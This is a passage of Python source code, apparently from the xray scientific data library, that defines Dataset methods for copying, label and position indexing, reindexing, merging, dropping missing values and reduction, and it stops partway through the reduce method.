def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getstate__(self):
"""Always load data in-memory before pickling"""
self.load()
# self.__dict__ is the default pickle object, we don't need to
# implement our own __setstate__ method to make pickle work
state = self.__dict__.copy()
# throw away any references to datastores in the pickle
state['_file_obj'] = None
return state
@property
def variables(self):
"""Frozen dictionary of xray.Variable objects constituting this
dataset's data
"""
return Frozen(self._variables)
def _attrs_copy(self):
return None if self._attrs is None else OrderedDict(self._attrs)
@property
def attrs(self):
"""Dictionary of global attributes on this dataset
"""
if self._attrs is None:
self._attrs = OrderedDict()
return self._attrs
@attrs.setter
def attrs(self, value):
self._attrs = OrderedDict(value)
@property
def dims(self):
"""Mapping from dimension names to lengths.
This dictionary cannot be modified directly, but is updated when adding
new variables.
"""
return Frozen(SortedKeysDict(self._dims))
def load(self):
"""Manually trigger loading of this dataset's data from disk or a
remote source into memory and return this dataset.
Normally, it should not be necessary to call this method in user code,
because all xray functions should either work on deferred data or
load data automatically. However, this method can be necessary when
working with many file objects on disk.
"""
# access .data to coerce everything to numpy or dask arrays
all_data = dict((k, v.data) for k, v in self.variables.items())
lazy_data = dict((k, v) for k, v in all_data.items()
if isinstance(v, dask_array_type))
if lazy_data:
import dask.array as da
# evaluate all the dask arrays simultaneously
evaluated_data = da.compute(*lazy_data.values())
for k, data in zip(lazy_data, evaluated_data):
self.variables[k].data = data
return self
def load_data(self): # pragma: no cover
warnings.warn('the Dataset method `load_data` has been deprecated; '
'use `load` instead',
FutureWarning, stacklevel=2)
return self.load()
@classmethod
def _construct_direct(cls, variables, coord_names, dims, attrs,
file_obj=None):
"""Shortcut around __init__ for internal use when we want to skip
costly validation
"""
obj = object.__new__(cls)
obj._variables = variables
obj._coord_names = coord_names
obj._dims = dims
obj._attrs = attrs
obj._file_obj = file_obj
return obj
__default_attrs = object()
def _replace_vars_and_dims(self, variables, coord_names=None,
attrs=__default_attrs, inplace=False):
"""Fastpath constructor for internal use.
Preserves coord names and attributes; dimensions are recalculated from
the supplied variables.
The arguments are *not* copied when placed on the new dataset. It is up
to the caller to ensure that they have the right type and are not used
elsewhere.
Parameters
----------
variables : OrderedDict
coord_names : set or None, optional
attrs : OrderedDict or None, optional
Returns
-------
new : Dataset
"""
dims = _calculate_dims(variables)
if inplace:
self._dims = dims
self._variables = variables
if coord_names is not None:
self._coord_names = coord_names
if attrs is not self.__default_attrs:
self._attrs = attrs
obj = self
else:
if coord_names is None:
coord_names = self._coord_names.copy()
if attrs is self.__default_attrs:
attrs = self._attrs_copy()
obj = self._construct_direct(variables, coord_names, dims, attrs)
return obj
def copy(self, deep=False):
"""Returns a copy of this dataset.
If `deep=True`, a deep copy is made of each of the component variables.
Otherwise, a shallow copy is made, so each variable in the new dataset
is also a variable in the original dataset.
"""
if deep:
variables = OrderedDict((k, v.copy(deep=True))
for k, v in iteritems(self._variables))
else:
variables = self._variables.copy()
# skip __init__ to avoid costly validation
return self._construct_direct(variables, self._coord_names.copy(),
self._dims.copy(), self._attrs_copy())
def _copy_listed(self, names, keep_attrs=True):
"""Create a new Dataset with the listed variables from this dataset and
        all relevant coordinates. Skips all validation.
"""
variables = OrderedDict()
coord_names = set()
for name in names:
try:
variables[name] = self._variables[name]
except KeyError:
ref_name, var_name, var = _get_virtual_variable(
self._variables, name)
variables[var_name] = var
if ref_name in self._coord_names:
coord_names.add(var_name)
needed_dims = set()
for v in variables.values():
needed_dims.update(v._dims)
for k in self._coord_names:
if set(self._variables[k]._dims) <= needed_dims:
variables[k] = self._variables[k]
coord_names.add(k)
dims = dict((k, self._dims[k]) for k in needed_dims)
attrs = self.attrs.copy() if keep_attrs else None
return self._construct_direct(variables, coord_names, dims, attrs)
def __copy__(self):
return self.copy(deep=False)
def __deepcopy__(self, memo=None):
# memo does nothing but is required for compatibility with
# copy.deepcopy
return self.copy(deep=True)
def __contains__(self, key):
"""The 'in' operator will return true or false depending on whether
'key' is an array in the dataset or not.
"""
return key in self._variables
def __len__(self):
return len(self._variables)
def __iter__(self):
return iter(self._variables)
@property
def nbytes(self):
return sum(v.nbytes for v in self.variables.values())
@property
def loc(self):
"""Attribute for location based indexing. Only supports __getitem__,
and only when the key is a dict of the form {dim: labels}.
"""
return _LocIndexer(self)
def __getitem__(self, key):
"""Access variables or coordinates this dataset as a
:py:class:`~xray.DataArray`.
Indexing with a list of names will return a new ``Dataset`` object.
"""
from .dataarray import DataArray
if utils.is_dict_like(key):
return self.isel(**key)
key = np.asarray(key)
if key.ndim == 0:
return DataArray._new_from_dataset(self, key.item())
else:
return self._copy_listed(key)
def __setitem__(self, key, value):
"""Add an array to this dataset.
If value is a `DataArray`, call its `select_vars()` method, rename it
to `key` and merge the contents of the resulting dataset into this
dataset.
If value is an `Variable` object (or tuple of form
``(dims, data[, attrs])``), add it to this dataset as a new
variable.
"""
if utils.is_dict_like(key):
raise NotImplementedError('cannot yet use a dictionary as a key '
'to set Dataset values')
self.update({key: value})
def __delitem__(self, key):
"""Remove a variable from this dataset.
If this variable is a dimension, all variables containing this
dimension are also removed.
"""
def remove(k):
del self._variables[k]
self._coord_names.discard(k)
remove(key)
if key in self._dims:
del self._dims[key]
also_delete = [k for k, v in iteritems(self._variables)
if key in v.dims]
for key in also_delete:
remove(key)
# mutable objects should not be hashable
__hash__ = None
def _all_compat(self, other, compat_str):
"""Helper function for equals and identical"""
# some stores (e.g., scipy) do not seem to preserve order, so don't
# require matching order for equality
compat = lambda x, y: getattr(x, compat_str)(y)
return (self._coord_names == other._coord_names
and utils.dict_equiv(self._variables, other._variables,
compat=compat))
def broadcast_equals(self, other):
"""Two Datasets are broadcast equal if they are equal after
broadcasting all variables against each other.
For example, variables that are scalar in one dataset but non-scalar in
        the other dataset can still be broadcast equal if the non-scalar
variable is a constant.
See Also
--------
Dataset.equals
Dataset.identical
"""
try:
return self._all_compat(other, 'broadcast_equals')
except (TypeError, AttributeError):
return False
def equals(self, other):
"""Two Datasets are equal if they have matching variables and
coordinates, all of which are equal.
Datasets can still be equal (like pandas objects) if they have NaN
values in the same locations.
This method is necessary because `v1 == v2` for ``Dataset``
        does element-wise comparisons (like numpy.ndarrays).
See Also
--------
Dataset.broadcast_equals
Dataset.identical
"""
try:
return self._all_compat(other, 'equals')
except (TypeError, AttributeError):
return False
def identical(self, other):
"""Like equals, but also checks all dataset attributes and the
attributes on all variables and coordinates.
See Also
--------
Dataset.broadcast_equals
Dataset.equals
"""
try:
return (utils.dict_equiv(self.attrs, other.attrs)
and self._all_compat(other, 'identical'))
except (TypeError, AttributeError):
return False
@property
def indexes(self):
"""OrderedDict of pandas.Index objects used for label based indexing
"""
return Indexes(self)
@property
def coords(self):
"""Dictionary of xray.DataArray objects corresponding to coordinate
variables
"""
return DatasetCoordinates(self)
@property
def data_vars(self):
"""Dictionary of xray.DataArray objects corresponding to data variables
"""
return Variables(self)
@property
def vars(self): # pragma: no cover
warnings.warn('the Dataset property `vars` has been deprecated; '
'use `data_vars` instead',
FutureWarning, stacklevel=2)
return self.data_vars
def set_coords(self, names, inplace=False):
"""Given names of one or more variables, set them as coordinates
Parameters
----------
names : str or list of str
Name(s) of variables in this dataset to convert into coordinates.
inplace : bool, optional
If True, modify this dataset inplace. Otherwise, create a new
object.
Returns
-------
Dataset
"""
# TODO: allow inserting new coordinates with this method, like
# DataFrame.set_index?
        # nb. check in self._variables, not self.data_vars to ensure that the
# operation is idempotent
if isinstance(names, basestring):
names = [names]
self._assert_all_in_dataset(names)
obj = self if inplace else self.copy()
obj._coord_names.update(names)
return obj
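    # Usage sketch (hypothetical data, not from the original source):
    #
    #     ds = Dataset({'temp': ('x', [1, 2, 3]), 'station': ('x', list('abc'))})
    #     ds2 = ds.set_coords('station')  # 'station' now appears in ds2.coords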
def reset_coords(self, names=None, drop=False, inplace=False):
"""Given names of coordinates, reset them to become variables
Parameters
----------
names : str or list of str, optional
Name(s) of non-index coordinates in this dataset to reset into
variables. By default, all non-index coordinates are reset.
drop : bool, optional
If True, remove coordinates instead of converting them into
variables.
inplace : bool, optional
If True, modify this dataset inplace. Otherwise, create a new
object.
Returns
-------
Dataset
"""
if names is None:
names = self._coord_names - set(self.dims)
else:
if isinstance(names, basestring):
names = [names]
self._assert_all_in_dataset(names)
_assert_empty(
set(names) & set(self.dims),
'cannot remove index coordinates with reset_coords: %s')
obj = self if inplace else self.copy()
obj._coord_names.difference_update(names)
if drop:
for name in names:
del obj._variables[name]
return obj
def dump_to_store(self, store, encoder=None, sync=True):
"""Store dataset contents to a backends.*DataStore object."""
variables, attrs = conventions.encode_dataset_coordinates(self)
if encoder:
variables, attrs = encoder(variables, attrs)
store.store(variables, attrs)
if sync:
store.sync()
def to_netcdf(self, path=None, mode='w', format=None, group=None,
engine=None):
"""Write dataset contents to a netCDF file.
Parameters
----------
path : str, optional
Path to which to save this dataset. If no path is provided, this
function returns the resulting netCDF file as a bytes object; in
this case, we need to use scipy.io.netcdf, which does not support
netCDF version 4 (the default format becomes NETCDF3_64BIT).
mode : {'w', 'a'}, optional
Write ('w') or append ('a') mode. If mode='w', any existing file at
this location will be overwritten.
format : {'NETCDF4', 'NETCDF4_CLASSIC', 'NETCDF3_64BIT', 'NETCDF3_CLASSIC'}, optional
File format for the resulting netCDF file:
* NETCDF4: Data is stored in an HDF5 file, using netCDF4 API
features.
* NETCDF4_CLASSIC: Data is stored in an HDF5 file, using only
            netCDF 3 compatible API features.
* NETCDF3_64BIT: 64-bit offset version of the netCDF 3 file format,
which fully supports 2+ GB files, but is only compatible with
clients linked against netCDF version 3.6.0 or later.
* NETCDF3_CLASSIC: The classic netCDF 3 file format. It does not
handle 2+ GB files very well.
All formats are supported by the netCDF4-python library.
scipy.io.netcdf only supports the last two formats.
The default format is NETCDF4 if you are saving a file to disk and
have the netCDF4-python library available. Otherwise, xray falls
back to using scipy to write netCDF files and defaults to the
NETCDF3_64BIT format (scipy does not support netCDF4).
group : str, optional
Path to the netCDF4 group in the given file to open (only works for
format='NETCDF4'). The group(s) will be created if necessary.
engine : {'netcdf4', 'scipy', 'h5netcdf'}, optional
Engine to use when writing netCDF files. If not provided, the
default engine is chosen based on available dependencies, with a
preference for 'netcdf4' if writing to a file on disk.
"""
from ..backends.api import to_netcdf
return to_netcdf(self, path, mode, format, group, engine)
    dump = utils.function_alias(to_netcdf, 'dump')
dumps = utils.function_alias(to_netcdf, 'dumps')
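    # Usage sketch (file names are hypothetical):
    #
    #     ds.to_netcdf('out.nc')                           # netCDF4 if available
    #     ds.to_netcdf('out3.nc', format='NETCDF3_64BIT')  # scipy-writable format
    #     raw_bytes = ds.to_netcdf()                       # in-memory bytes object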
def __repr__(self):
return formatting.dataset_repr(self)
@property
def chunks(self):
"""Block dimensions for this dataset's data or None if it's not a dask
array.
"""
chunks = {}
for v in self.variables.values():
if v.chunks is not None:
new_chunks = list(zip(v.dims, v.chunks))
if any(chunk != chunks[d] for d, chunk in new_chunks
if d in chunks):
raise ValueError('inconsistent chunks')
chunks.update(new_chunks)
return Frozen(SortedKeysDict(chunks))
def chunk(self, chunks=None, lock=False):
"""Coerce all arrays in this dataset into dask arrays with the given
chunks.
Non-dask arrays in this dataset will be converted to dask arrays. Dask
arrays will be rechunked to the given chunk sizes.
        If chunks are not provided for one or more dimensions, chunk
        sizes along those dimensions will not be updated; non-dask arrays will be
converted into dask arrays with a single block.
Parameters
----------
chunks : int or dict, optional
Chunk sizes along each dimension, e.g., ``5`` or
``{'x': 5, 'y': 5}``.
lock : optional
Passed on to :py:func:`dask.array.from_array`, if the array is not
already as dask array.
Returns
-------
chunked : xray.Dataset
"""
if isinstance(chunks, Number):
chunks = dict.fromkeys(self.dims, chunks)
if chunks is not None:
bad_dims = [d for d in chunks if d not in self.dims]
if bad_dims:
raise ValueError('some chunks keys are not dimensions on this '
'object: %s' % bad_dims)
def selkeys(dict_, keys):
if dict_ is None:
return None
return dict((d, dict_[d]) for d in keys if d in dict_)
def maybe_chunk(name, var, chunks):
chunks = selkeys(chunks, var.dims)
if not chunks:
chunks = None
if var.ndim > 0:
return var.chunk(chunks, name=name, lock=lock)
else:
return var
variables = OrderedDict([(k, maybe_chunk(k, v, chunks))
for k, v in self.variables.items()])
return self._replace_vars_and_dims(variables)
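    # Usage sketch (assumes dask is installed; dimension names hypothetical):
    #
    #     chunked = ds.chunk({'time': 100})  # blocks of 100 along 'time'
    #     chunked.chunks                     # mapping of dim -> block sizes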
def isel(self, **indexers):
"""Returns a new dataset with each array indexed along the specified
dimension(s).
This method selects values from each array using its `__getitem__`
method, except this method does not require knowing the order of
each array's dimensions.
Parameters
----------
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by integers, slice objects or arrays.
Returns
-------
obj : Dataset
A new Dataset with the same contents as this dataset, except each
array and dimension is indexed by the appropriate indexers. In
general, each array's data will be a view of the array's data
in this dataset, unless numpy fancy indexing was triggered by using
an array indexer, in which case the data will be a copy.
See Also
--------
Dataset.sel
DataArray.isel
DataArray.sel
"""
        invalid = [k for k in indexers if k not in self.dims]
if invalid:
raise ValueError("dimensions %r do not exist" % invalid)
# all indexers should be int, slice or np.ndarrays
indexers = [(k, (np.asarray(v)
if not isinstance(v, (int, np.integer, slice))
else v))
for k, v in iteritems(indexers)]
variables = OrderedDict()
for name, var in iteritems(self._variables):
var_indexers = dict((k, v) for k, v in indexers if k in var.dims)
variables[name] = var.isel(**var_indexers)
return self._replace_vars_and_dims(variables)
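    # Usage sketch (dimension names are hypothetical):
    #
    #     ds.isel(time=0)           # first position along 'time'
    #     ds.isel(x=slice(10, 20))  # positions 10..19 along 'x'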
def sel(self, method=None, **indexers):
"""Returns a new dataset with each array indexed by tick labels
along the specified dimension(s).
In contrast to `Dataset.isel`, indexers for this method should use
labels instead of integers.
        Under the hood, this method is powered by using pandas's powerful Index
objects. This makes label based indexing essentially just as fast as
using integer indexing.
It also means this method uses pandas's (well documented) logic for
indexing. This means you can use string shortcuts for datetime indexes
(e.g., '2000-01' to select all values in January 2000). It also means
that slices are treated as inclusive of both the start and stop values,
unlike normal Python indexing.
Parameters
----------
method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
Method to use for inexact matches (requires pandas>=0.16):
* default: only exact matches
            * pad / ffill: propagate last valid index value forward
* backfill / bfill: propagate next valid index value backward
* nearest: use nearest valid index value
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by scalars, slices or arrays of tick labels.
Returns
-------
obj : Dataset
A new Dataset with the same contents as this dataset, except each
variable and dimension is indexed by the appropriate indexers. In
general, each variable's data will be a view of the variable's data
in this dataset, unless numpy fancy indexing was triggered by using
an array indexer, in which case the data will be a copy.
See Also
--------
Dataset.isel
DataArray.isel
DataArray.sel
"""
return self.isel(**indexing.remap_label_indexers(self, indexers,
method=method))
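    # Usage sketch: unlike isel, sel takes labels, and label slices include
    # both endpoints:
    #
    #     ds.sel(time='2000-01')           # every timestamp in January 2000
    #     ds.sel(x=0.5, method='nearest')  # closest tick label to 0.5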
def isel_points(self, dim='points', **indexers):
"""Returns a new dataset with each array indexed pointwise along the
specified dimension(s).
This method selects pointwise values from each array and is akin to
the NumPy indexing behavior of `arr[[0, 1], [0, 1]]`, except this
method does not require knowing the order of each array's dimensions.
Parameters
----------
dim : str or DataArray or pandas.Index or other list-like object, optional
Name of the dimension to concatenate along. If dim is provided as a
string, it must be a new dimension name, in which case it is added
along axis=0. If dim is provided as a DataArray or Index or
list-like object, its name, which must not be present in the
dataset, is used as the dimension to concatenate along and the
values are added as a coordinate.
**indexers : {dim: indexer, ...}
Keyword arguments with names matching dimensions and values given
by array-like objects. All indexers must be the same length and
1 dimensional.
Returns
-------
obj : Dataset
A new Dataset with the same contents as this dataset, except each
array and dimension is indexed by the appropriate indexers. With
pointwise indexing, the new Dataset will always be a copy of the
original.
See Also
--------
Dataset.sel
DataArray.isel
DataArray.sel
DataArray.isel_points
"""
indexer_dims = set(indexers)
def relevant_keys(mapping):
return [k for k, v in mapping.items()
if any(d in indexer_dims for d in v.dims)]
data_vars = relevant_keys(self.data_vars)
coords = relevant_keys(self.coords)
# all the indexers should be iterables
keys = indexers.keys()
indexers = [(k, np.asarray(v)) for k, v in iteritems(indexers)]
# Check that indexers are valid dims, integers, and 1D
for k, v in indexers:
if k not in self.dims:
raise ValueError("dimension %s does not exist" % k)
if v.dtype.kind != 'i':
raise TypeError('Indexers must be integers')
if v.ndim != 1:
raise ValueError('Indexers must be 1 dimensional')
# all the indexers should have the same length
lengths = set(len(v) for k, v in indexers)
if len(lengths) > 1:
raise ValueError('All indexers must be the same length')
# Existing dimensions are not valid choices for the dim argument
if isinstance(dim, basestring):
if dim in self.dims:
# dim is an invalid string
raise ValueError('Existing dimension names are not valid '
                                 'choices for the dim argument in isel_points')
elif hasattr(dim, 'dims'):
# dim is a DataArray or Coordinate
if dim.name in self.dims:
# dim already exists
raise ValueError('Existing dimensions are not valid choices '
                                 'for the dim argument in isel_points')
else:
# try to cast dim to DataArray with name = points
from .dataarray import DataArray
dim = DataArray(dim, dims='points', name='points')
# TODO: This would be sped up with vectorized indexing. This will
# require dask to support pointwise indexing as well.
return concat([self.isel(**d) for d in
[dict(zip(keys, inds)) for inds in
zip(*[v for k, v in indexers])]],
dim=dim, coords=coords, data_vars=data_vars)
def reindex_like(self, other, method=None, copy=True):
"""Conform this object onto the indexes of another object, filling
in missing values with NaN.
Parameters
----------
other : Dataset or DataArray
Object with an 'indexes' attribute giving a mapping from dimension
names to pandas.Index objects, which provides coordinates upon
which to index the variables in this dataset. The indexes on this
other object need not be the same as the indexes on this
dataset. Any mis-matched index values will be filled in with
NaN, and any mis-matched dimension names will simply be ignored.
method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
Method to use for filling index values from other not found in this
dataset:
* default: don't fill gaps
            * pad / ffill: propagate last valid index value forward
* backfill / bfill: propagate next valid index value backward
* nearest: use nearest valid index value (requires pandas>=0.16)
copy : bool, optional
If `copy=True`, the returned dataset contains only copied
variables. If `copy=False` and no reindexing is required then
original variables from this dataset are returned.
Returns
-------
reindexed : Dataset
Another dataset, with this dataset's data but coordinates from the
other object.
See Also
--------
Dataset.reindex
align
"""
return self.reindex(method=method, copy=copy, **other.indexes)
def reindex(self, indexers=None, method=None, copy=True, **kw_indexers):
"""Conform this object onto a new set of indexes, filling in
missing values with NaN.
Parameters
----------
        indexers : dict, optional
Dictionary with keys given by dimension names and values given by
arrays of coordinates tick labels. Any mis-matched coordinate values
will be filled in with NaN, and any mis-matched dimension names will
simply be ignored.
method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
Method to use for filling index values in ``indexers`` not found in
this dataset:
* default: don't fill gaps
            * pad / ffill: propagate last valid index value forward
* backfill / bfill: propagate next valid index value backward
* nearest: use nearest valid index value (requires pandas>=0.16)
copy : bool, optional
If `copy=True`, the returned dataset contains only copied
variables. If `copy=False` and no reindexing is required then
original variables from this dataset are returned.
**kw_indexers : optional
Keyword arguments in the same form as ``indexers``.
Returns
-------
reindexed : Dataset
Another dataset, with this dataset's data but replaced coordinates.
See Also
--------
Dataset.reindex_like
align
pandas.Index.get_indexer
"""
indexers = utils.combine_pos_and_kw_args(indexers, kw_indexers,
'reindex')
if not indexers:
# shortcut
return self.copy(deep=True) if copy else self
variables = alignment.reindex_variables(
self.variables, self.indexes, indexers, method, copy=copy)
return self._replace_vars_and_dims(variables)
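    # Usage sketch (index values are hypothetical):
    #
    #     ds.reindex(x=[0, 1, 2, 3])                  # unmatched labels -> NaN
    #     ds.reindex(x=[0, 1, 2, 3], method='ffill')  # pad from last valid label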
def rename(self, name_dict, inplace=False):
"""Returns a new object with renamed variables and dimensions.
Parameters
----------
name_dict : dict-like
Dictionary whose keys are current variable or dimension names and
whose values are new names.
inplace : bool, optional
If True, rename variables and dimensions in-place. Otherwise,
return a new dataset object.
Returns
-------
renamed : Dataset
Dataset with renamed variables and dimensions.
See Also
--------
Dataset.swap_dims
DataArray.rename
"""
for k in name_dict:
if k not in self:
raise ValueError("cannot rename %r because it is not a "
"variable in this dataset" % k)
variables = OrderedDict()
coord_names = set()
for k, v in iteritems(self._variables):
name = name_dict.get(k, k)
dims = tuple(name_dict.get(dim, dim) for dim in v.dims)
var = v.copy(deep=False)
var.dims = dims
variables[name] = var
if k in self._coord_names:
coord_names.add(name)
return self._replace_vars_and_dims(variables, coord_names,
inplace=inplace)
def swap_dims(self, dims_dict, inplace=False):
"""Returns a new object with swapped dimensions.
Parameters
----------
dims_dict : dict-like
Dictionary whose keys are current dimension names and whose values
are new names. Each value must already be a variable in the
dataset.
inplace : bool, optional
If True, swap dimensions in-place. Otherwise, return a new dataset
object.
Returns
-------
renamed : Dataset
Dataset with swapped dimensions.
See Also
--------
Dataset.rename
DataArray.swap_dims
"""
for k, v in dims_dict.items():
if k not in self.dims:
raise ValueError('cannot swap from dimension %r because it is '
'not an existing dimension' % k)
if self.variables[v].dims != (k,):
raise ValueError('replacement dimension %r is not a 1D '
'variable along the old dimension %r'
% (v, k))
result_dims = set(dims_dict.get(dim, dim) for dim in self.dims)
variables = OrderedDict()
coord_names = self._coord_names.copy()
coord_names.update(dims_dict.values())
for k, v in iteritems(self.variables):
dims = tuple(dims_dict.get(dim, dim) for dim in v.dims)
var = v.to_coord() if k in result_dims else v.to_variable()
var.dims = dims
variables[k] = var
return self._replace_vars_and_dims(variables, coord_names,
inplace=inplace)
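    # Usage sketch: promote an existing 1D variable to be the indexing
    # dimension (data is hypothetical):
    #
    #     ds = Dataset({'y': ('x', list('abc'))}, coords={'x': [0, 1, 2]})
    #     ds.swap_dims({'x': 'y'})  # arrays are now indexed along 'y'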
def update(self, other, inplace=True):
"""Update this dataset's variables with those from another dataset.
Parameters
----------
other : Dataset or castable to Dataset
Dataset or variables with which to update this dataset.
inplace : bool, optional
If True, merge the other dataset into this dataset in-place.
Otherwise, return a new dataset object.
Returns
-------
updated : Dataset
Updated dataset.
Raises
------
ValueError
If any dimensions would have inconsistent sizes in the updated
dataset.
"""
return self.merge(
other, inplace=inplace, overwrite_vars=list(other), join='left')
def merge(self, other, inplace=False, overwrite_vars=set(),
compat='broadcast_equals', join='outer'):
"""Merge the arrays of two datasets into a single dataset.
        This method generally does not allow for overriding data, with the exception
of attributes, which are ignored on the second dataset. Variables with
the same name are checked for conflicts via the equals or identical
methods.
Parameters
----------
other : Dataset or castable to Dataset
Dataset or variables to merge with this dataset.
inplace : bool, optional
If True, merge the other dataset into this dataset in-place.
Otherwise, return a new dataset object.
overwrite_vars : str or sequence, optional
If provided, update variables of these name(s) without checking for
conflicts in this dataset.
compat : {'broadcast_equals', 'equals', 'identical'}, optional
String indicating how to compare variables of the same name for
potential conflicts:
- 'broadcast_equals': all values must be equal when variables are
broadcast against each other to ensure common dimensions.
- 'equals': all values and dimensions must be the same.
- 'identical': all values, dimensions and attributes must be the
same.
join : {'outer', 'inner', 'left', 'right'}, optional
Method for joining ``self`` and ``other`` along shared dimensions:
- 'outer': use the union of the indexes
- 'inner': use the intersection of the indexes
- 'left': use indexes from ``self``
- 'right': use indexes from ``other``
Returns
-------
merged : Dataset
Merged dataset.
Raises
------
ValueError
If any variables conflict (see ``compat``).
"""
if compat not in ['broadcast_equals', 'equals', 'identical']:
raise ValueError("compat=%r invalid: must be 'broadcast_equals', "
"'equals' or 'identical'" % compat)
if isinstance(overwrite_vars, basestring):
overwrite_vars = [overwrite_vars]
overwrite_vars = set(overwrite_vars)
merge = _merge_dataset if isinstance(other, Dataset) else _merge_dict
replace_vars, new_vars, new_coord_names = merge(
self, other, overwrite_vars, compat=compat, join=join)
newly_coords = new_coord_names & (set(self) - set(self.coords))
no_longer_coords = set(self.coords) & (set(new_vars) - new_coord_names)
ambiguous_coords = (newly_coords | no_longer_coords) - overwrite_vars
if ambiguous_coords:
raise ValueError('cannot merge: the following variables are '
'coordinates on one dataset but not the other: %s'
% list(ambiguous_coords))
obj = self if inplace else self.copy()
obj._update_vars_and_coords(replace_vars, new_coord_names)
return obj
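    # Usage sketch (variable names are hypothetical):
    #
    #     merged = ds.merge({'pressure': ('x', [1000.0, 990.0, 1013.0])})
    #     ds.merge(other, join='inner')  # keep only shared index labels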
def _assert_all_in_dataset(self, names, virtual_okay=False):
bad_names = set(names) - set(self._variables)
if virtual_okay:
bad_names -= self.virtual_variables
if bad_names:
raise ValueError('One or more of the specified variables '
'cannot be found in this dataset')
def drop(self, labels, dim=None):
"""Drop variables or index labels from this dataset.
If a variable corresponding to a dimension is dropped, all variables
that use that dimension are also dropped.
Parameters
----------
        labels : str or sequence of str
            Names of variables or index labels to drop.
dim : None or str, optional
Dimension along which to drop index labels. By default (if
``dim is None``), drops variables rather than index labels.
Returns
-------
dropped : Dataset
"""
if utils.is_scalar(labels):
labels = [labels]
if dim is None:
return self._drop_vars(labels)
else:
new_index = self.indexes[dim].drop(labels)
return self.loc[{dim: new_index}]
def _drop_vars(self, names):
self._assert_all_in_dataset(names)
drop = set(names)
drop |= set(k for k, v in iteritems(self._variables)
if any(name in v.dims for name in names))
variables = OrderedDict((k, v) for k, v in iteritems(self._variables)
if k not in drop)
coord_names = set(k for k in self._coord_names if k in variables)
return self._replace_vars_and_dims(variables, coord_names)
def drop_vars(self, *names): # pragma: no cover
warnings.warn('the Dataset method `drop_vars` has been deprecated; '
'use `drop` instead',
FutureWarning, stacklevel=2)
return self.drop(names)
def transpose(self, *dims):
"""Return a new Dataset object with all array dimensions transposed.
Although the order of dimensions on each array will change, the dataset
dimensions themselves will remain in fixed (sorted) order.
Parameters
----------
*dims : str, optional
By default, reverse the dimensions on each array. Otherwise,
reorder the dimensions to this order.
Returns
-------
transposed : Dataset
            Each array in the dataset (including coordinates) will be
transposed to the given order.
Notes
-----
Although this operation returns a view of each array's data, it
is not lazy -- the data will be fully loaded into memory.
See Also
--------
numpy.transpose
DataArray.transpose
"""
if dims:
if set(dims) ^ set(self.dims):
raise ValueError('arguments to transpose (%s) must be '
'permuted dataset dimensions (%s)'
% (dims, tuple(self.dims)))
ds = self.copy()
for name, var in iteritems(self._variables):
var_dims = tuple(dim for dim in dims if dim in var.dims)
ds._variables[name] = var.transpose(*var_dims)
return ds
@property
def T(self):
return self.transpose()
def squeeze(self, dim=None):
"""Returns a new dataset with squeezed data.
Parameters
----------
dim : None or str or tuple of str, optional
Selects a subset of the length one dimensions. If a dimension is
selected with length greater than one, an error is raised. If
None, all length one dimensions are squeezed.
Returns
-------
squeezed : Dataset
            This dataset, but with all or a subset of the dimensions of
length 1 removed.
Notes
-----
Although this operation returns a view of each variable's data, it is
not lazy -- all variable data will be fully loaded.
See Also
--------
numpy.squeeze
"""
return common.squeeze(self, self.dims, dim)
def dropna(self, dim, how='any', thresh=None, subset=None):
"""Returns a new dataset with dropped labels for missing values along
the provided dimension.
Parameters
----------
dim : str
Dimension along which to drop missing values. Dropping along
multiple dimensions simultaneously is not yet supported.
how : {'any', 'all'}, optional
* any : if any NA values are present, drop that label
* all : if all values are NA, drop that label
thresh : int, default None
If supplied, require this many non-NA values.
subset : sequence, optional
Subset of variables to check for missing values. By default, all
variables in the dataset are checked.
Returns
-------
Dataset
"""
# TODO: consider supporting multiple dimensions? Or not, given that
# there are some ugly edge cases, e.g., pandas's dropna differs
# depending on the order of the supplied axes.
if dim not in self.dims:
raise ValueError('%s must be a single dataset dimension' % dim)
if subset is None:
subset = list(self.data_vars)
count = np.zeros(self.dims[dim], dtype=np.int64)
size = 0
for k in subset:
array = self._variables[k]
if dim in array.dims:
dims = [d for d in array.dims if d != dim]
count += array.count(dims)
size += np.prod([self.dims[d] for d in dims])
if thresh is not None:
mask = count >= thresh
elif how == 'any':
mask = count == size
elif how == 'all':
mask = count > 0
elif how is not None:
raise ValueError('invalid how option: %s' % how)
else:
raise TypeError('must specify how or thresh')
return self.isel(**{dim: mask})
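    # Usage sketch: drop 'time' labels where any data variable is NaN, or
    # keep labels with at least three valid values:
    #
    #     ds.dropna('time')
    #     ds.dropna('time', thresh=3)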
def fillna(self, value):
"""Fill missing values in this object.
This operation follows the normal broadcasting and alignment rules that
xray uses for binary arithmetic, except the result is aligned to this
object (``join='left'``) instead of aligned to the intersection of
index coordinates (``join='inner'``).
Parameters
----------
value : scalar, ndarray, DataArray, dict or Dataset
Used to fill all matching missing values in this dataset's data
            variables. Scalar, ndarray or DataArray arguments are used to
fill all data with aligned coordinates (for DataArrays).
Dictionaries or datasets match data variables and then align
coordinates if necessary.
Returns
-------
Dataset
"""
return self._fillna(value)
def reduce(self, func, dim=None, keep_attrs=False, numeric_only=False,
allow_lazy=False, **kwargs):
"""Reduce this dataset by applying `func` along some dimension(s).
Parameters
----------
func : function
Function which can be called in the form
`f(x, axis=axis, **kwargs)` to return the result of reducing an
np.ndarray over an integer valued axis.
dim : str or sequence of str, optional
Dimension(s) over which to apply `func`. By default `func` is
applied over all dimensions.
keep_attrs : bool, optional
            If True, the dataset's attributes (`attrs`) will be copied from
the original object to the new one. If False (default), the new
object will be returned without attributes.
numeric_only : bool, optional
If True, only apply ``func`` to variables with a numeric dtype.
**kwargs : dict
Additional keyword arguments passed on to ``func``.
Returns
-------
reduced : Dataset
Dataset with this object's DataArrays replaced with new DataArrays
of summarized data and the indicated dimension(s) removed.
"""
if isinstance(dim, basestring):
dims = set([dim])
elif dim is None:
dims = set(self.dims)
else:
dims = set(dim)
_assert_empty([dim for dim in dims if dim not in self.dims],
'Dataset does not contain the dimensions: %s')
variables = OrderedDict()
for name, var in iteritems(self._variables):
reduce_dims = [dim for dim in var.dims if dim in dims]
if reduce_dims or not var.dims:
if name not in self.coords:
if (not numeric_only
or np.issubdtype(var.dtype, np.number)
or var.dtype == np.bool_):
if len(reduce_dims) == 1:
